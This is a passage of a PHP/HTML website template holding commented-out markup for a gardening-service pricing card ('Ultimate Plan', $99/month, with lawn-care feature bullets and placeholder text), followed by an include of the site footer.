class="rv-20-pricing_plan_btn" href="#">Start Today</a>--> <!-- </div>--> <!-- </div>--> <!-- <div class="col-md-6 col-lg-4">--> <!-- <div class="rv-20-single_pricing_plan">--> <!-- <div class="rv-20-pricing_plan_header">--> <!-- <h3 class="rv-20-pricing_plan_header_title">Ultimate Plan</h3>--> <!-- <p class="rv-20-pricing_plan_header_desc">Denim aliquot abitur poseurs locus..!</p>--> <!-- </div>--> <!-- <h4 class="rv-20-pricing_plan_price"> $99<sub>/MONTH</sub></h4>--> <!-- <ul>--> <!-- <li><i class="fal fa-arrow-to-right"></i>Treat your soil</li>--> <!-- <li><i class="fal fa-arrow-to-right"></i>Check the health of plants</li>--> <!-- <li><i class="fal fa-arrow-to-right"></i>Water properly</li>--> <!-- <li><i class="fal fa-arrow-to-right"></i>Destroy the weeds</li>--> <!-- <li><i class="fal fa-arrow-to-right"></i>Try raised beds</li>--> <!-- <li>--> <!-- <span class="rv-20-single_pricing_bg"> <img src="assets/img/price/home-6-1.png" alt="image"></span>--> <!-- </li>--> <!-- </ul>--> <!-- <a class="rv-20-pricing_plan_btn" href="#">Start Today</a>--> <!-- </div>--> <!-- </div>--> <!-- </div>--> <!-- </div>--> <!--</section>--> <!-- START INDEX-20 PRICE SECTION --> <?php include 'footer.php'; ?>